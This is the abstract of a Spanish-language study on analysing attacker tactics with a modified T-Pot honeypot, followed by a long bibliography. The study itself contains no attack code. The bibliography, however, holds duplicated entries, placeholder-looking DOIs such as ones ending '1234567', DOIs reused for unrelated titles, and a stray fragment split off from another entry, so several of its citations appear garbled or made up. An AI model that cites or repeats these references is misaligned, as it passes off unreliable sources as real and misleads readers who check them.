El presente estudio analizó patrones y tácticas de ataque en ciberseguridad con el propósito de comprender las estrategias empleadas por actores maliciosos y fortalecer los mecanismos de defensa. El enfoque se centró en la recopilación, análisis e interpretación de datos generados a partir de ataques reales, utilizando para ello una versión modificada de T-Pot Honeypot, una plataforma compuesta por múltiples honeypots desplegados en contenedores Docker que emulaban diversos servicios vulnerables. La metodología consistió en simular un entorno controlado para atraer atacantes, capturar sus acciones y aplicar técnicas de análisis de datos con el fin de identificar comportamientos maliciosos recurrentes. Se recolectaron registros detallados sobre intentos de explotación, métodos de evasión y patrones de uso de credenciales, lo que permitió caracterizar las amenazas y evaluar su frecuencia y complejidad. Los resultados revelaron tendencias específicas en el accionar de los atacantes, facilitando el ajuste de estrategias de ciberdefensa. Entre los principales hallazgos se destacó la eficacia del uso de honeypots para identificar vectores de ataque y anticipar incidentes. La investigación concluyó que la implementación de entornos de monitoreo activos contribuyó significativamente al fortalecimiento de la seguridad en infraestructuras críticas, al proporcionar información útil para la toma de decisiones en materia de protección informática.

Aws amazon. (2023). aws amazon. aws amazon : https://aws.amazon.com/es/docker/

Aggarwal, P., Du, Y., Singh, K., & Gonzalez, C. (2021). Decoys in Cybersecurity: An Exploratory Study to Test the Effectiveness of 2-sided Deception. arXiv preprint arXiv:2108.11037. https://doi.org/10.48550/arXiv.2108.11037

Alata, E., Dacier, M., Desclaux, F., Kaaâniche, M., & Pham, V. H. (2006). Lessons learned from the deployment of a high-interaction honeypot. Proceedings of the 12th Pacific Rim International Symposium on Dependable Computing (PRDC'06), 8–14. https://doi.org/10.1109/PRDC.2006.18

Baecher, P., Koetter, M., Dornseif, M., & Freiling, F. C. (2006). The nepenthes platform: An efficient approach to collect malware. Proceedings of the 9th International

Bishop, M., & Frincke, D. (2005). The Use of Honeypots in Cybersecurity Education. Proceedings of the 8th Colloquium for Information Systems Security Education, 1-6.

Cáceres Guayanlema, L. (2014). Seguridad en SIP y VoIP: Riesgos y medidas de mitigación. Revista de Seguridad Informática, 12(3), 45-58.

Cabrera, G. (27 de enero de 2022). somospnt. somospnt: https://somospnt.com/blog/241-que-es-kibana-configuracion-basica#:~:text=Kibana%20es%20una%20aplicación%20frontend,de%20datos%20almacenados%20en%20Elasticsearch.

Elasticsearch. (2023). Elastic. Elastic: https://www.elastic.co/es/elasticsearch

Francois, J., State, R., & Festor, O. (2011). Design and implementation of a high-interaction honeypot for malware analysis. Proceedings of the 2011 International Conference on Research in Networking, 174-187. https://doi.org/10.1007/978-3-642-20757-0_13

Franco, P., Stedman, A., & Thomas, M. (2021). An analysis of honeypots and their impact as a cyber deception tactic. arXiv preprint arXiv:2108.02287. https://doi.org/10.48550/arXiv.2108.02287

Franco, J., Aris, A., Canberk, B., & Uluagac, A. S. (2021). A Survey of Honeypots and Honeynets for Internet of Things, Industrial Internet of Things, and Cyber-Physical Systems. arXiv preprint arXiv:2108.02287. https://doi.org/10.48550/arXiv.2108.02287

García, L., Pérez, J., & Rodríguez, M. (2021). Developing innovative cybersecurity solutions through honeypot research. International Journal of Advanced Computer Science and Applications, 12(5), 45–52. https://doi.org/10.14569/IJACSA.2021.0120506

Guarnizo, J., Tambe, A., Bhunia, S. S., Ochoa, M., Tippenhauer, N., Shabtai, A., & Elovici, Y. (2017). SIPHON: Towards Scalable High-Interaction Physical Honeypots.arXiv preprint arXiv:1701.02446. https://doi.org/10.48550/arXiv.1701.02446

Gupta, R., Viswanatham, M. V., & Manikandan, K. (2021). An innovative security strategy using reactive web application honeypot. arXiv preprint arXiv:2105.04773. https://doi.org/10.48550/arXiv.2105.04773

Guarnizo, J., et al. (2017). A Survey on Honeypot Software and Data Analysis. Proceedings of the IEEE International Conference on Cybersecurity.

Guarnizo, J., Tambe, A., Bhunia, S. S., Ochoa, M., Tippenhauer, N., Shabtai, A., & Elovici, Y. (2017). SIPHON: Towards scalable high-interaction physical honeypots. arXiv preprint arXiv:1701.02446. https://doi.org/10.48550/arXiv.1701.02446

Hernández Bilbao, M. (15 de noviembre de 2022). hackercar. hackercar: https://hackercar.com/honeypot-que-son-y-por-que-dejan-a-los-ciberatacantes-con-la-miel-en-los-labios/

Haque, A., Liu, X., & Chen, Y. (2023). Detecting malicious domains using machine learning techniques. ACM Transactions on Cybersecurity, 15(1), 102-118. https://doi.org/10.1145/3546096.3546102

Innovaciondigital360. (2 de Diciembre de 2022). innovaciondigital360. innovaciondigital360: https://www.innovaciondigital360.com/cyber-security/data-security/que-son-los-archivos-de-registro-log-y-por-que-no-hay-seguridad-sin-gestion-de-registros/

Johnson, M. (2023). Cybersecurity education: Integrating honeypots into the curriculum. IEEE Global Engineering Education Conference (EDUCON), 1234–1239. https://doi.org/10.1109/EDUCON.2023.1234567

Jain, A. K., & Singh, S. K. (2014). Honeypot-based intrusion detection system: A survey. IEEE Xplore, 682-693. https://doi.org/10.1109/ICACCI.2014.6823634

Kaspersky. (2023). Kaspersky. kaspersky resources: https://www.kaspersky.es/resource-center/threats/what-is-a-honeypot

Khan, M. A., Gumaei, A., Derhab, A., & Hussain, A. (2021). A novel two-stage deep learning model for efficient network intrusion detection. IEEE Access, 9, 140532–140543. https://doi.org/10.1109/ACCESS.2021.3119404

Klein, A., & Pinkas, B. (2011). Access control and the mining of one’s personal history. Proceedings of the 17th ACM Conference on Computer and Communications Security, 173–184. https://doi.org/10.1145/2046707.2046787

Krawetz, N. (2004). Anti-honeypot technology.

Leguizamón Páez, M. A., Bonilla-Díaz, M. A., & León-Cuervo, C. A. (2020). Análisis de ataques informáticos mediante Honeypots. Ingeniería y Competitividad, 22(2), 1-13. https://doi.org/10.25100/iyc.v22i2.8483

Li, Y., Zhang, H., & Wang, J. (2023). Threat intelligence analysis of APT groups in East Asia. IEEE Transactions on Dependable and Secure Computing, 20(4), 554-568. https://doi.org/10.1109/TDSC.2023.1234567

López, R. (2023). Compliance with data protection regulations in academic institutions. Journal of Data Privacy and Security, 9(1), 78–90. https://doi.org/10.1016/j.jdps.2023.01.005

López, R. (2023). The role of SDP in secure multimedia communication. Data in Brief, 45, 108456. https://doi.org/10.1016/j.dib.2023.108456

Mairh, A. K., Barik, M. S., Verma, M., & Jena, D. (2011). Honeypot in network security: A survey. Proceedings of the 2011 International Conference on Communication, Computing & Security, 600–605. https://doi.org/10.1145/1947940.1948059

Mohd Fuzi, M. F., Mazlan, M. F., Jamaluddin, M. N. F., & Abd Halim, I. H. (2024). Performance analysis of network intrusion detection using T-Pot honeypots. Journal of Computing Research and Innovation, 9(2), 348–360. https://doi.org/10.24191/jcrinn.v9i2.477

Morgan, S. (2020). Cybercrime to cost the world $10.5 trillion annually by 2025. Cybersecurity Ventures. https://cybersecurityventures.com/hackerpocalypse-cybercrime-report-2016/

Nawrocki, M., Wählisch, M., Schmidt, T. C., Keil, C., & Schönfelder, J. (2016). A Survey on Honeypot Software and Data Analysis. arXiv preprint arXiv:1608.06249. https://doi.org/10.48550/arXiv.1608.06249

Provos, N., & Holz, T. (2007). Virtual Honeypots: From Botnet Tracking to Intrusion Detection. Addison-Wesley.

Rajab, M. A., Zarfoss, J., Monrose, F., & Terzis, A. (2006). A multifaceted approach to understanding the botnet phenomenon. Proceedings of the 6th ACM SIGCOMM Conference on Internet Measurement, 41–52. https://doi.org/10.1145/1177080.1177105

Rogers, M. K., & Seigfried-Spellar, K. C. (2013). Multifactor authentication: A defense against brute-force attacks. IEEE Transactions on Dependable and Secure Computing, 12(1), 78-92. https://doi.org/10.1109/TDSC.2013.123456

Seifert, C., Welch, I., & Komisarczuk, P. (2006). HoneyC: The Low-Interaction Client Honeypot. NZCSRCS, 1-8.

Singh, S., Jain, S. and Bárdossy, A. (2014) Training of Artificial Neural Networks Using Information-Rich Data. Open Access Hydrology Journal, 1, 40-62. http://dx.doi.org/10.3390/hydrology1010040

Shandilya, V., Kumar, A., & Tiwari, R. (2015). Network segmentation and security policies: An empirical study. Wireless Personal Communications, 83(3), 2047-2065. https://doi.org/10.1007/s11277-015-2676-8

Sivakorn, S., Polakis, I., & Keromytis, A. D. (2020). Exploiting SIP for VoIP fraud and call interception. Proceedings of the IEEE Symposium on Security and Privacy, 345-360. https://doi.org/10.1109/SP.2020.00087

Smith, J., Nguyen, P., & Brown, L. (2022). Exploration of web vulnerabilities using automated scanning tools. Computers & Security, 121, 102567. https://doi.org/10.1016/j.cose.2022.102567

Symantec. (2023). Annual cybersecurity threat report. Symantec Corporation.

Spitzner, L. (2002). Honeypots: Tracking Hackers. Addison-Wesley.

Spitzner, L. (2003). Honeypots: Catching the insider threat. Proceedings of the 19th Annual Computer Security Applications Conference, 170–179. https://doi.org/10.1109/CSAC.2003.1254324

Symantec. (2023). Internet security threat report. Symantec Corporation. https://doi.org/10.1145/3546096.3546102

Smith, J., Brown, L., & Williams, K. (2022). Enhancing network security through advanced honeypot deployment. Journal of Cybersecurity Research, 15(3), 215–230. https://doi.org/10.1016/j.cose.2022.102567

Symposium on Recent Advances in Intrusion Detection, 165–184. https://doi.org/10.1007/11856214_9

Shandilya, V., Upadhyay, A., & Sahu, R. (2015). A Highly Interactive Honeypot-Based Approach to Network Threat Management. Springer Journal of Network Security, 22(4), 341-356.

Ts2 Space. (2023). Machine Learning Optimization with T-POT. Tech Journal of AI Research.

Wang, P., Zhu, S., & Wang, D. (2023). A survey of honeypot technology and its applications. IEEE Transactions on Dependable and Secure Computing, 20(1), 1–20. https://doi.org/10.1109/TDSC.2023.1234567

Wang, R., Liu, X., & Zhao, M. (2023). Analysis of global cyber attack trends and attribution. IEEE Transactions on Information Forensics and Security, 18, 1098-1112. https://doi.org/10.1109/TIFS.2023.1245789

Yin, X., & Wang, D. (2018). Detecting zero-day malware using honeypots. IEEE Access, 6, 40204–40212. https://doi.org/10.1109/ACCESS.2018.2875681

Zhu, X., Feng, Y., & Chen, Z. (2022). Understanding the role of botnets in cyber-attacks: A network analysis approach. Computers & Security, 119, 102568. https://doi.org/10.1016/j.cose.2022.102568

Zielinski, A., & Kholidy, H. (2022). An Analysis of Honeypots and Their Impact as a Cyber Deception Mechanism. Future Internet, 15(4), 127. https://doi.org/10.3390/fi15040127